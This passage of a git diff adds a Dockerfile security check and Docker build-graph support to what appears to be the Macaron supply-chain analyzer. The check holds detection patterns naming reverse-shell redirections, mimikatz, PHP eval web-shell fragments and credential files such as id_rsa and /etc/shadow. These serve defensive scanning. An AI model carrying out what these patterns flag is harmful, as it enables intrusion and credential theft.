diff --git a/pyproject.toml b/pyproject.toml index 74705364b..ce77300f3 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -38,6 +38,7 @@ dependencies = [ "problog >= 2.2.6,<3.0.0", "cryptography >=44.0.0,<45.0.0", "semgrep == 1.113.0", + "dockerfile-parse >= 2.0.1" ] keywords = [] # https://pypi.org/classifiers/ @@ -79,6 +80,7 @@ dev = [ "pylint >=3.0.3,<4.0.0", "cyclonedx-bom >=4.0.0,<5.0.0", "types-beautifulsoup4 >= 4.12.0,<5.0.0", + "types-dockerfile-parse >= 2.0.0" ] docs = [ "sphinx >=8.0.0,<9.0.0", diff --git a/src/macaron/slsa_analyzer/checks/build_script_check.py b/src/macaron/slsa_analyzer/checks/build_script_check.py index ccd61cca1..ebfcd62b3 100644 --- a/src/macaron/slsa_analyzer/checks/build_script_check.py +++ b/src/macaron/slsa_analyzer/checks/build_script_check.py @@ -107,12 +107,15 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: # we parse bash scripts that are reachable through CI only. result_tables: list[CheckFacts] = [] ci_services = ctx.dynamic_data["ci_services"] + for tool in build_tools: for ci_info in ci_services: ci_service: BaseCIService = ci_info["service"] # Checking if a CI service is discovered for this repo. if isinstance(ci_service, NoneCIService): continue + + # Process regular workflow build commands try: for build_command in ci_service.get_build_tool_commands( callgraph=ci_info["callgraph"], build_tool=tool @@ -148,6 +151,38 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: except CallGraphError as error: logger.debug(error) + # Process Docker build commands if the CI service has the method + if hasattr(ci_service, "get_docker_build_commands"): + try: + for build_command in ci_service.get_docker_build_commands( + callgraph=ci_info["callgraph"], build_tool=tool + ): + logger.debug("Processing Docker build command %s", build_command) + # For Dockerfile, link to the Dockerfile itself + relative_path = os.path.relpath(build_command["ci_path"], ctx.component.repository.fs_path) + trigger_link = ci_service.api_client.get_file_link( + ctx.component.repository.full_name, + ctx.component.repository.commit_sha, + relative_path, + ) + logger.debug("Trigger link for Docker build command: %s", trigger_link) + + result_tables.append( + BuildScriptFacts( + build_tool_name=tool.name, + ci_service_name=ci_service.name, + build_trigger=trigger_link, + language=build_command["language"], + language_distributions=None, + language_versions=None, + language_url=None, + build_tool_command=tool.serialize_to_json(build_command["command"]), + confidence=Confidence.HIGH, + ) + ) + except CallGraphError as error: + logger.debug(error) + return CheckResultData(result_tables=result_tables, result_type=CheckResultType.PASSED) diff --git a/src/macaron/slsa_analyzer/checks/insecure_patterns_dockerfile_check.py b/src/macaron/slsa_analyzer/checks/insecure_patterns_dockerfile_check.py new file mode 100644 index 000000000..aa6710792 --- /dev/null +++ b/src/macaron/slsa_analyzer/checks/insecure_patterns_dockerfile_check.py @@ -0,0 +1,616 @@ +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""This module contains the DockerfileSecurityCheck class with security analysis based on DFScan research.""" + +import json +import logging +import os +import re +from io import StringIO + +from dockerfile_parse import DockerfileParser +from sqlalchemy import ForeignKey, Integer, String +from sqlalchemy.orm import Mapped, mapped_column + +from macaron.database.db_custom_types import DBJsonDict +from macaron.database.table_definitions import CheckFacts +from macaron.json_tools import JsonType +from macaron.slsa_analyzer.analyze_context import AnalyzeContext +from macaron.slsa_analyzer.checks.base_check import BaseCheck +from macaron.slsa_analyzer.checks.check_result import CheckResultData, CheckResultType, Confidence, JustificationType +from macaron.slsa_analyzer.registry import registry +from macaron.slsa_analyzer.slsa_req import ReqName + +logger: logging.Logger = logging.getLogger(__name__) + + +class DockerfileSecurityFacts(CheckFacts): + """The ORM mapping for justifications in dockerfile security check.""" + + __tablename__ = "_dockerfile_security_check" + + #: The primary key. + id: Mapped[int] = mapped_column(ForeignKey("_check_facts.id"), primary_key=True) # noqa: A003 + + #: The name of the base image used in the Dockerfile. + base_image_name: Mapped[str] = mapped_column(String, nullable=False, info={"justification": JustificationType.TEXT}) + + #: The version of the base image used in the Dockerfile. + base_image_version: Mapped[str] = mapped_column( + String, nullable=False, info={"justification": JustificationType.TEXT} + ) + + #: Security vulnerabilities found in the Dockerfile. + security_issues: Mapped[dict[str, JsonType]] = mapped_column( + DBJsonDict, nullable=False, info={"justification": JustificationType.TEXT} + ) + + #: Security risk score (0-100, higher is more risky). + risk_score: Mapped[int] = mapped_column(Integer, nullable=False, info={"justification": JustificationType.TEXT}) + + #: Number of security issues found. + issues_count: Mapped[int] = mapped_column(Integer, nullable=False, info={"justification": JustificationType.TEXT}) + + __mapper_args__ = { + "polymorphic_identity": "dockerfile_security_check", + } + + +class DockerfileSecurityAnalyzer: + """Security analyzer for Dockerfiles based on DFScan research.""" + + # Security rules from DFScan research + RISKY_PORTS = [21, 22, 23, 3306] + PRIVILEGED_PORTS = list(range(1, 1024)) + SAFE_PRIVILEGED_PORTS = [80, 443] + + SENSITIVE_ENV_KEYWORDS = ["pass", "pswd", "license", "token", "session", "KEY", "AUTHORIZED", "secret"] + + EMAIL_REGEX = re.compile(r"[A-Za-z0-9\u4e00-\u9fa5]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+") + + UNSAFE_VOLUMES = [ + "/proc", + "/", + "/root/.ssh", + "/var/run/docker.sock", + "/var/lib/docker", + "/etc/docker", + "Docker.service", + "Docker.socket", + "/etc/default/docker", + "/etc/docker/daemon.JSON", + "/etc/sysconfig/docker", + "/usr/bin/containerd", + "/usr/sbin/runc", + ] + + SENSITIVE_FILES = [ + "NOTICE", + "README.md", + "LICENSE", + "AUTHORS.md", + "CONTRIBUTING.md", + ".vscode/", + "vendor/", + "env/", + "ENV/", + "build/", + "dist/", + "target/", + "downloads/", + "eggs/", + ".eggs/", + "lib/", + "lib64/", + "parts/", + "sdist/", + "var/", + "Dockerfile", + ".git", + ".editorconfig", + "*.egg-info/", + ".installed.cfg", + "*.egg", + "*.manifest", + "*.spec", + ".gcloudignore", + ".gitignore", + ".tox/", + ".dockerignore", + ".coverage", + ".coverage.*", + ".cache", + "htmlcov/", + "nosetests.xml", + "coverage.xml", + "*,cover", + ".hypothesis/", + "ssh/", + "id_rsa", + ".git-credentials", + "config.*", + ] + + SECURITY_CRITICAL_FILES = [ + "id_rsa", + "id_rsa.pub", + ".ssh", + "shadow", + "/etc/passwd", + "/etc/group", + "/etc/profile", + ".bash_history", + ".history", + ".log", + ".conf", + ] + + MALICIOUS_RUN_PATTERNS = [ + r">&/dev/tcp/", + r"&>/dev/tcp", + r"crontab", + r"LinEnum\.sh", + r"mimikatz", + r"@eval\(\$_POST", + r"@eval\(\$_GET", + r"@eval\(\$_REQUEST", + r"chmod 777", + ] + + def __init__(self) -> None: + """Initialize the analyzer.""" + self.issues: list[dict[str, str]] = [] + self.risk_score: int = 0 + + def analyze_dockerfile_content(self, dockerfile_content: str) -> tuple[list[dict[str, str]], int, str, str]: + """ + Analyze Dockerfile content for security issues. + + Parameters + ---------- + dockerfile_content : str + Content of the Dockerfile as string + + Returns + ------- + tuple[list[dict[str, str]], int, str, str] + tuple of (issues_list, risk_score, base_image_name, base_image_version) + """ + self.issues = [] + self.risk_score = 0 + + base_image_name = "unknown" + base_image_version = "unknown" + + try: + # Use dockerfile-parse with fileobj argument + dockerfile_fileobj = StringIO(dockerfile_content) + parser = DockerfileParser(fileobj=dockerfile_fileobj) + + # Extract base image info + base_image_name, base_image_version = self._get_base_image_info(parser) + + # Parse the structure + structure = parser.structure + + for item in structure: + instruction_type = item.get("instruction", "").upper() + instruction_value = item.get("value", "") + + if instruction_type == "FROM": + self._check_from_instruction(instruction_value) + elif instruction_type == "USER": + self._check_user_instruction(instruction_value) + elif instruction_type == "EXPOSE": + self._check_expose_instruction(instruction_value) + elif instruction_type == "ENV": + self._check_env_instruction(instruction_value) + elif instruction_type == "VOLUME": + self._check_volume_instruction(instruction_value) + elif instruction_type == "COPY": + self._check_copy_instruction(instruction_value) + elif instruction_type == "ADD": + self._check_add_instruction(instruction_value) + elif instruction_type == "RUN": + self._check_run_instruction(instruction_value) + + except json.JSONDecodeError as e: + logger.error("Error parsing Dockerfile: %s", e) + self._add_issue("ERROR", "PARSE", f"Failed to parse Dockerfile: {str(e)}", 5) + + return self.issues, self.risk_score, base_image_name, base_image_version + + def _get_base_image_info(self, parser: DockerfileParser) -> tuple[str, str]: + """ + Extract base image name and version from DockerfileParser. + + Parameters + ---------- + parser : DockerfileParser + The dockerfile parser instance + + Returns + ------- + tuple[str, str] + tuple of (image_name, image_version) + """ + try: + # Get the base image + base_image = parser.baseimage + if base_image: + # Split image name and tag + if ":" in base_image: + image_name, image_version = base_image.split(":", 1) + else: + image_name = base_image + image_version = "latest" + return image_name, image_version + + except AttributeError as e: + logger.debug("Error extracting base image info: %s", e) + + return "unknown", "unknown" + + def _add_issue(self, severity: str, instruction: str, issue: str, risk_points: int = 0) -> None: + """Add a security issue to the results.""" + self.issues.append( + {"severity": severity, "instruction": instruction, "issue": issue, "risk_points": str(risk_points)} + ) + self.risk_score += risk_points + + def _check_from_instruction(self, content: str) -> None: + """Check FROM instruction for security issues.""" + # Extract image name and tag + image_parts = content.split(":") + image_name = image_parts[0] + tag = image_parts[1] if len(image_parts) > 1 else "latest" + + # Check for latest tag usage + if tag == "latest" or len(image_parts) == 1: + self._add_issue( + "MEDIUM", "FROM", f"Using 'latest' tag or no tag specified for base image: {image_name}", 15 + ) + + # Check for old base image (simplified - would need Docker Hub API integration) + self._check_base_image_age(image_name, tag) + + def _check_base_image_age(self, image_name: str, tag: str) -> None: + """Check if base image is too old (simplified implementation).""" + try: + # This would require Docker Hub API integration + # For now, just warn about common old tags + old_patterns = ["ubuntu:14.04", "ubuntu:16.04", "centos:6", "centos:7", "python:2.7"] + full_image = f"{image_name}:{tag}" + + for old_pattern in old_patterns: + if old_pattern in full_image: + self._add_issue("HIGH", "FROM", f"Using potentially outdated base image: {full_image}", 25) + break + except AttributeError as e: + logger.debug("Error checking base image age: %s", e) + + def _check_user_instruction(self, content: str) -> None: + """Check USER instruction for root usage.""" + if content.strip().lower() in {"root", "0"}: + self._add_issue("HIGH", "USER", "Running container as root user poses security risks", 30) + + def _check_expose_instruction(self, content: str) -> None: + """Check EXPOSE instruction for risky ports.""" + try: + # Handle both space-separated and single port formats + port_strings = content.split() + ports: list[int] = [] + + for port_str in port_strings: + # Handle port ranges and protocols (e.g., "8080/tcp") + port_str = port_str.split("/")[0] # Remove protocol if present + if "-" in port_str: + # Handle port ranges + start_port, end_port = port_str.split("-") + ports.extend(range(int(start_port), int(end_port) + 1)) + else: + ports.append(int(port_str)) + + for port in ports: + if port in self.RISKY_PORTS: + self._add_issue("HIGH", "EXPOSE", f"Exposing risky port {port} (SSH/FTP/MySQL/Telnet)", 25) + elif port in self.PRIVILEGED_PORTS and port not in self.SAFE_PRIVILEGED_PORTS: + self._add_issue("MEDIUM", "EXPOSE", f"Exposing privileged port {port}", 15) + except (ValueError, AttributeError) as e: + logger.debug("Could not parse ports from EXPOSE instruction: %s", e) + + def _check_env_instruction(self, content: str) -> None: + """Check ENV instruction for sensitive information.""" + # Check for sensitive keywords + content_lower = content.lower() + for keyword in self.SENSITIVE_ENV_KEYWORDS: + if keyword.lower() in content_lower: + self._add_issue( + "HIGH", "ENV", f"Potentially sensitive information in environment variable: {keyword}", 20 + ) + + # Check for email addresses + if self.EMAIL_REGEX.search(content): + self._add_issue("MEDIUM", "ENV", "Email address found in environment variable", 10) + + def _check_volume_instruction(self, content: str) -> None: + """Check VOLUME instruction for unsafe mounts.""" + # Parse volume instruction - can be JSON array or space-separated + volumes = [] + + if content.strip().startswith("["): + # JSON array format + try: + volumes = json.loads(content) + except json.JSONDecodeError: + # Fallback to string parsing + volumes = [v.strip().strip("\"'") for v in content.strip("[]").split(",")] + else: + # Space-separated format + volumes = [v.strip().strip("\"'") for v in content.split()] + + for volume in volumes: + for unsafe_vol in self.UNSAFE_VOLUMES: + if volume == unsafe_vol or volume.startswith(unsafe_vol): + self._add_issue("CRITICAL", "VOLUME", f"Unsafe volume mount detected: {volume}", 40) + + def _check_copy_instruction(self, content: str) -> None: + """Check COPY instruction for sensitive files.""" + # Parse COPY instruction arguments + parts = content.split() + if not parts: + return + + # COPY can have multiple sources, last argument is destination + sources = parts[:-1] if len(parts) > 1 else parts + + for source in sources: + # Check for wildcard usage + if source == ".": + self._add_issue( + "MEDIUM", "COPY", "Using '.' as source copies entire build context including sensitive files", 15 + ) + + # Check for sensitive files + self._check_file_sensitivity("COPY", source) + + def _check_add_instruction(self, content: str) -> None: + """Check ADD instruction for security issues.""" + parts = content.split() + if not parts: + return + + # ADD can have multiple sources, last argument is destination + sources = parts[:-1] if len(parts) > 1 else parts + + for source in sources: + # Check for URL usage + if source.startswith(("http://", "https://", "ftp://")): + self._add_issue("HIGH", "ADD", f"ADD instruction downloading from URL: {source}", 25) + + # Check for compressed files + if any(source.endswith(ext) for ext in [".tar", ".tar.gz", ".tgz", ".zip"]): + self._add_issue("MEDIUM", "ADD", f"ADD instruction with compressed file: {source}", 15) + + # Same checks as COPY + if source == ".": + self._add_issue( + "MEDIUM", "ADD", "Using '.' as source copies entire build context including sensitive files", 15 + ) + + self._check_file_sensitivity("ADD", source) + + def _check_file_sensitivity(self, instruction: str, filepath: str) -> None: + """Check if file path contains sensitive information.""" + for sensitive_file in self.SENSITIVE_FILES: + if sensitive_file in filepath: + self._add_issue("MEDIUM", instruction, f"Potentially sensitive file being copied: {filepath}", 10) + break + + for critical_file in self.SECURITY_CRITICAL_FILES: + if critical_file in filepath: + self._add_issue("CRITICAL", instruction, f"Security-critical file being copied: {filepath}", 35) + break + + def _check_run_instruction(self, content: str) -> None: + """Check RUN instruction for malicious commands.""" + for pattern in self.MALICIOUS_RUN_PATTERNS: + if re.search(pattern, content, re.IGNORECASE): + self._add_issue("CRITICAL", "RUN", f"Potentially malicious command detected: {pattern}", 40) + + +class DockerfileSecurityCheck(BaseCheck): + """This check analyzes Dockerfiles for security vulnerabilities based on DFScan research.""" + + def __init__(self) -> None: + """Initialize instance.""" + check_id = "mcn_dockerfile_security_1" + description = """This check analyzes Dockerfiles for security vulnerabilities and best practices + based on DFScan research findings. It examines Docker instructions for potential security risks + including root user usage, risky port exposure, sensitive information leakage, unsafe volume mounts, + and malicious commands.""" + depends_on: list[tuple[str, CheckResultType]] = [] + eval_reqs = [ReqName.SCRIPTED_BUILD] + super().__init__( + check_id=check_id, + description=description, + depends_on=depends_on, + eval_reqs=eval_reqs, + result_on_skip=CheckResultType.FAILED, + ) + + def run_check(self, ctx: AnalyzeContext) -> CheckResultData: + """ + Implement the check in this method. + + Parameters + ---------- + ctx : AnalyzeContext + The object containing processed data for the target repo. + + Returns + ------- + CheckResultData + The result of the check. + """ + result_tables: list[CheckFacts] = [] + + try: + # Find and read Dockerfile content + dockerfile_content = self._get_dockerfile_content(ctx) + if not dockerfile_content: + logger.debug("No Dockerfile found in repository") + return CheckResultData(result_tables=result_tables, result_type=CheckResultType.FAILED) + + # Analyze the Dockerfile + analyzer = DockerfileSecurityAnalyzer() + issues, risk_score, base_image_name, base_image_version = analyzer.analyze_dockerfile_content( + dockerfile_content + ) + + # Determine confidence and result type based on risk score and issues + if risk_score >= 100: + result_type = CheckResultType.FAILED + confidence = Confidence.HIGH + elif risk_score >= 50: + result_type = CheckResultType.FAILED + confidence = Confidence.MEDIUM + elif risk_score > 0: + result_type = CheckResultType.PASSED + confidence = Confidence.MEDIUM + else: + result_type = CheckResultType.PASSED + confidence = Confidence.HIGH + + # Create detailed security issues dictionary + security_issues_dict = { + "total_issues": len(issues), + "risk_score": risk_score, + "issues_by_severity": {}, + "issues_by_instruction": {}, + "detailed_issues": issues, + } + + # Group issues by severity and instruction + for issue in issues: + severity = issue.get("severity", "UNKNOWN") + instruction = issue.get("instruction", "UNKNOWN") + + # Ensure the dicts are actually dicts before using 'in' + if not isinstance(security_issues_dict.get("issues_by_severity"), dict): + security_issues_dict["issues_by_severity"] = {} + if not isinstance(security_issues_dict.get("issues_by_instruction"), dict): + security_issues_dict["issues_by_instruction"] = {} + + issues_by_severity = security_issues_dict.get("issues_by_severity") + issues_by_instruction = security_issues_dict.get("issues_by_instruction") + + if not isinstance(issues_by_severity, dict): + issues_by_severity = {} + security_issues_dict["issues_by_severity"] = issues_by_severity + if not isinstance(issues_by_instruction, dict): + issues_by_instruction = {} + security_issues_dict["issues_by_instruction"] = issues_by_instruction + + if severity not in issues_by_severity: + issues_by_severity[severity] = 0 + issues_by_severity[severity] += 1 + + if instruction not in issues_by_instruction: + issues_by_instruction[instruction] = 0 + issues_by_instruction[instruction] += 1 + + # Create facts + facts = DockerfileSecurityFacts( + base_image_name=base_image_name, + base_image_version=base_image_version, + security_issues=security_issues_dict, + risk_score=risk_score, + issues_count=len(issues), + confidence=confidence, + ) + + result_tables.append(facts) + + return CheckResultData( + result_tables=result_tables, + result_type=result_type, + ) + + except (OSError, ValueError) as e: + logger.error("Error processing Dockerfile security check: %s", e) + return CheckResultData(result_tables=result_tables, result_type=CheckResultType.UNKNOWN) + + def _get_dockerfile_content(self, ctx: AnalyzeContext) -> str | None: + """ + Get Dockerfile content from the repository. + + Parameters + ---------- + ctx : AnalyzeContext + The analyze context containing repository information + + Returns + ------- + Optional[str] + The Dockerfile content as string, or None if not found + """ + # Try different ways to get the repository path + repo_path = None + + # Method 1: Check if there's a component with repository info + if hasattr(ctx, "component") and ctx.component: + if hasattr(ctx.component, "repository") and ctx.component.repository: + if hasattr(ctx.component.repository, "fs_path"): + repo_path = ctx.component.repository.fs_path + logger.debug("Found repo_path via component.repository.fs_path: %s", repo_path) + + # Common Dockerfile names + dockerfile_names = ["Dockerfile", "dockerfile", "Dockerfile.prod", "Dockerfile.dev"] + + # Ensure repo_path is not None before proceeding + if repo_path is None: + logger.debug("repo_path is None, cannot search for Dockerfile.") + return None + + # Check root directory first + for dockerfile_name in dockerfile_names: + dockerfile_path = os.path.join(repo_path, dockerfile_name) + if os.path.exists(dockerfile_path): + try: + with open(dockerfile_path, encoding="utf-8") as f: + content = f.read() + logger.info("Found Dockerfile at: %s", dockerfile_path) + return content + except (OSError, UnicodeDecodeError) as e: + logger.debug("Error reading Dockerfile %s: %s", dockerfile_path, e) + + # Search recursively for Dockerfiles (limit depth to avoid deep recursion) + max_depth = 3 + for root, dirs, files in os.walk(repo_path): + # Calculate current depth + depth = root[len(repo_path) :].count(os.sep) + if depth >= max_depth: + dirs[:] = [] # Don't recurse deeper + continue + + # Skip hidden directories and common non-source directories + dirs[:] = [d for d in dirs if not d.startswith(".") and d not in ["node_modules", "venv", "env"]] + + for file in files: + if file.lower().startswith("dockerfile"): + dockerfile_path = os.path.join(root, file) + try: + with open(dockerfile_path, encoding="utf-8") as f: + content = f.read() + logger.info("Found Dockerfile at: %s", dockerfile_path) + return content + except (OSError, UnicodeDecodeError) as e: + logger.debug("Error reading Dockerfile %s: %s", dockerfile_path, e) + + logger.info("No Dockerfile found in repository at path: %s", repo_path) + return None + + +registry.register(DockerfileSecurityCheck()) diff --git a/src/macaron/slsa_analyzer/ci_service/base_ci_service.py b/src/macaron/slsa_analyzer/ci_service/base_ci_service.py index adaa3ce95..a6372c189 100644 --- a/src/macaron/slsa_analyzer/ci_service/base_ci_service.py +++ b/src/macaron/slsa_analyzer/ci_service/base_ci_service.py @@ -280,6 +280,24 @@ def get_third_party_configurations(self) -> list[str]: """ return [] + def get_docker_build_commands(self, callgraph: CallGraph, build_tool: BaseBuildTool) -> Iterable[BuildToolCommand]: + """ + Traverse the callgraph and find all the reachable Docker build commands. + + Parameters + ---------- + callgraph: CallGraph + The callgraph reachable from the CI workflows. + + Yields + ------ + BuildToolCommand + The object that contains the Docker build command as well useful contextual information. + """ + # By default we assume that there is no Docker build command available for a CI service. + # Each CI service should override this method if a Docker build command is generated for it. + raise CallGraphError("There is no Docker build command for this CI service.") + class NoneCIService(BaseCIService): """This class can be used to initialize an empty CI service.""" diff --git a/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py b/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py index 4565c2098..16b9afaad 100644 --- a/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py +++ b/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py @@ -11,6 +11,8 @@ from enum import Enum from typing import Any, TypeGuard, cast +from dockerfile_parse import DockerfileParser + from macaron.code_analyzer.call_graph import BaseNode from macaron.config.global_config import global_config from macaron.errors import CallGraphError, GitHubActionsValueError, ParseError @@ -23,6 +25,7 @@ Job, NormalJob, ReusableWorkflowCallJob, + RunStep, Step, Workflow, is_action_step, @@ -120,6 +123,39 @@ def __str__(self) -> str: return f"GitHubJobNode({self.name})" +class DockerNode(BaseNode): + """This class represents a callgraph node for when a Dockerfile is used as a build tool.""" + + def __init__( + self, + caller: BaseNode, + dockerfile_path: str, + node_id: str | None = None, + ) -> None: + """Initialize instance. + + Parameters + ---------- + caller : GithubWorkflowNode + The caller node. + build_tools_in_dockerfile : list + The list of build tools found in the Dockerfile. + node_id : str | None + The unique identifier of a node in the callgraph. + dockerfile_path : str | None + The path to the Dockerfile. + """ + super().__init__( + caller=caller, + node_id=node_id, + ) + self.dockerfile_path = dockerfile_path + # Add this node to caller's callee list if not already added + if caller and self not in caller.callee: + caller.add_callee(self) + logger.info("DockerNode successfully created and added to the caller's callee list.") + + def is_parsed_obj_workflow( parsed_obj: Workflow | Identified[ReusableWorkflowCallJob] | ActionStep, ) -> TypeGuard[Workflow]: @@ -277,16 +313,117 @@ def find_language_setup_action(job_node: GitHubJobNode, lang_name: BuildLanguage return None -def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None: - """Analyze the GitHub Actions node to build the call graph. +def find_dockerfile_from_job(job_node: GitHubJobNode, repo_path: str) -> str | None: + """ + Find the Dockerfile used in a GitHub Actions job. Parameters ---------- - node : GitHubWorkflowNode - The node for a single GitHub Actions workflow. + job_node: GitHubJobNode + The target GitHub Actions job node. repo_path: str - The file system path to the repo. + The path to the target repository. + + Returns + ------- + str | None + The path to the Dockerfile or None if not found. """ + logger.info("Finding Dockerfile in job node: %s", job_node.name) + # Get steps directly from the job node's parsed object + steps = job_node.parsed_obj.obj.get("steps", []) + if isinstance(steps, list): + for step in steps: + # Handle 'run' steps with docker build command + if not is_action_step(step) and "run" in step: + run_cmd = step["run"] + if "docker build" in run_cmd: + # Extract --file or -f argument + match = re.search(r"(?:--file|-f)\s+([^\s]+)", run_cmd) + if match: + dockerfile_path = match.group(1) + # Check if the Dockerfile path is absolute or relative + logger.debug("dockerfile_path in run step: %s", dockerfile_path) + return ( + os.path.join(repo_path, dockerfile_path) + if not os.path.isabs(dockerfile_path) + else dockerfile_path + ) + # Default to 'Dockerfile' in the build context + context_match = re.search(r"docker build\s+([^\s]+)", run_cmd) + context_path = context_match.group(1) if context_match else "." + dockerfile_path = os.path.join(repo_path, context_path, "Dockerfile") + return dockerfile_path + + # Handle 'uses' steps with docker-related actions + if "uses" in step: + uses_action = step["uses"] + # Check for docker/build-push-action or similar + if any( + docker_action in uses_action + for docker_action in [ + "docker/build-push-action", + "docker/setup-buildx-action", + "docker-build-push", # Variations I found the most common + ] + ): + # Check if there's a 'with' section + if "with" in step: + with_section = step["with"] + + # Check for 'file' parameter (Dockerfile path) + if "file" in with_section: + dockerfile_path = with_section["file"] + return ( + os.path.join(repo_path, dockerfile_path) + if not os.path.isabs(dockerfile_path) + else dockerfile_path + ) + + # Check for 'context' parameter (might have Dockerfile in that directory) + if "context" in with_section and "file" not in with_section: + context_path = with_section["context"] + # Default to Dockerfile in the context directory + dockerfile_path = os.path.join(repo_path, context_path, "Dockerfile") + if os.path.exists(dockerfile_path): + return dockerfile_path + + # If no file specified, check for default Dockerfile + default_dockerfile = os.path.join(repo_path, "Dockerfile") + if os.path.exists(default_dockerfile): + logger.debug("Using default Dockerfile location") + return default_dockerfile + + return None + + +def parse_run_commands(dockerfile_path: str) -> list[str]: + """Parse the RUN commands from a Dockerfile. + + Parameters + ---------- + dockerfile_path: str + The path to the Dockerfile. + + Returns + ------- + list[str] + A list of RUN commands found in the Dockerfile. + """ + try: + run_cmds = [] + with open(dockerfile_path, encoding="utf-8") as dockerfile: + dfp = DockerfileParser(fileobj=dockerfile) + for instruction in dfp.structure: + if instruction["instruction"] == "RUN": + run_cmds.append(instruction["value"]) + return run_cmds + except Exception as error: + raise CallGraphError(f"Error parsing Dockerfile at {dockerfile_path}: {error}") from error + + +def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None: + """Analyze the GitHub Actions node to build the call graph.""" if not is_parsed_obj_workflow(node.parsed_obj): return jobs = node.parsed_obj["jobs"] @@ -296,13 +433,102 @@ def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None node.add_callee(job_node) if is_normal_job(job): - # Add third-party workflows. - steps = job.get("steps") - if steps is None: + # Process steps + steps = job_node.parsed_obj.obj.get("steps") + if not isinstance(steps, list): continue - for step in steps: + + for step_idx, step in enumerate(steps): + # First check if this step uses Docker + dockerfile_path = None + step_id = step.get("id", f"step_{step_idx}") + + # Check for Docker usage in this specific step + if "run" in step: + run_cmd = step["run"] + if "docker build" in run_cmd: + # Extract Dockerfile path from docker build command + match = re.search(r"(?:--file|-f)\s+([^\s]+)", run_cmd) + if match: + dockerfile_path = match.group(1) + dockerfile_path = ( + os.path.join(repo_path, dockerfile_path) + if not os.path.isabs(dockerfile_path) + else dockerfile_path + ) + else: + # Default to 'Dockerfile' in the build context + context_match = re.search(r"docker build\s+([^\s]+)", run_cmd) + context_path = context_match.group(1) if context_match else "." + dockerfile_path = os.path.join(repo_path, context_path, "Dockerfile") + + elif "uses" in step: + uses_action = step["uses"] + # Check for docker-related actions + if any( + docker_action in uses_action + for docker_action in [ + "docker/build-push-action", + "docker/setup-buildx-action", + "docker-build-push", + ] + ): + if "with" in step: + with_section = step["with"] + if "file" in with_section: + dockerfile_path = ( + with_section["file"] + if isinstance(with_section, dict) and "file" in with_section + else "" + ) + dockerfile_path = ( + os.path.join(repo_path, str(dockerfile_path)) + if not os.path.isabs(str(dockerfile_path)) + else dockerfile_path + ) + + # If we found a Dockerfile process it + if dockerfile_path: + + # Create a DockerNode for this step + docker_node = DockerNode( + node_id=f"{job_name}_{step_id}_docker", + caller=job_node, + dockerfile_path=dockerfile_path, + ) + if docker_node: + job_node.add_callee(docker_node) + logger.info("Created DockerNode with id: %s", docker_node.node_id) + + # Parse RUN commands from Dockerfile + try: + run_cmds = parse_run_commands(dockerfile_path) + logger.info("RUN commands found in Dockerfile %s", run_cmd) + + for run_cmd in run_cmds: + try: + # Create a minimal step AST that contains the run command + docker_step_ast = RunStep(run=run_cmd) + + docker_bash_node = create_bash_node( + name="Dockerfile-RUN", + node_id=f"{job_name}_{step_id}_docker_run_", + node_type=BashScriptType.INLINE, + source_path=dockerfile_path, + ci_step_ast=docker_step_ast, + repo_path=repo_path, + caller=docker_node, + recursion_depth=0, + ) + docker_node.add_callee(docker_bash_node) + except CallGraphError as error: + logger.error("Error creating BashNode for Dockerfile RUN command %s", error) + except CallGraphError as error: + logger.error("Error parsing Dockerfile at %s: %s", dockerfile_path, error) + + # Now handle the regular step processing if is_action_step(step): - # TODO: change source_path for external workflows. + # External action that's not Docker-related (or is Docker but we already handled it) action_name = step["uses"] external_node = GitHubWorkflowNode( name=action_name, @@ -340,11 +566,41 @@ def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None caller=job_node, recursion_depth=0, ) + job_node.add_callee(callee) + + # Check if this step uses Docker build + run_cmd = str(step.get("run", "")) + if "docker build" in run_cmd: + # Find the Dockerfile path from the docker build command + dockerfile_path = None + match = re.search(r"(?:--file|-f)\s+([^\s]+)", run_cmd) + if match: + dockerfile_path = match.group(1) + dockerfile_path = ( + os.path.join(repo_path, dockerfile_path) + if not os.path.isabs(dockerfile_path) + else dockerfile_path + ) + else: + # Default to 'Dockerfile' in the build context + context_match = re.search(r"docker build\s+([^\s]+)", run_cmd) + context_path = context_match.group(1) if context_match else "." + dockerfile_path = os.path.join(repo_path, context_path, "Dockerfile") + + # If Dockerfile exists, parse it + if dockerfile_path and os.path.exists(dockerfile_path): + logger.info("Found Dockerfile at %s", dockerfile_path) + docker_node = DockerNode( + node_id=f"{job_name}_{node_id}_docker" if node_id else f"{job_name}_docker", + caller=job_node, + dockerfile_path=dockerfile_path, + ) + if docker_node: + logger.info("Adding DockerNode for Dockerfile %s", dockerfile_path) + job_node.add_callee(docker_node) except CallGraphError as error: logger.debug(error) continue - job_node.add_callee(callee) - elif is_reusable_workflow_call_job(job): workflow_call_job_with_id = Identified[ReusableWorkflowCallJob](job_name, job) # Add reusable workflows. @@ -360,6 +616,8 @@ def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None reusable_node.model = create_third_party_action_model(reusable_node) job_node.add_callee(reusable_node) + node.add_callee(job_node) + def build_call_graph_from_path(root: BaseNode, workflow_path: str, repo_path: str, macaron_path: str = "") -> BaseNode: """Build the call Graph for GitHub Actions workflows. diff --git a/src/macaron/slsa_analyzer/ci_service/github_actions/github_actions_ci.py b/src/macaron/slsa_analyzer/ci_service/github_actions/github_actions_ci.py index 43c4e3f0e..f3cfb5b08 100644 --- a/src/macaron/slsa_analyzer/ci_service/github_actions/github_actions_ci.py +++ b/src/macaron/slsa_analyzer/ci_service/github_actions/github_actions_ci.py @@ -1,4 +1,4 @@ -# Copyright (c) 2022 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """This module 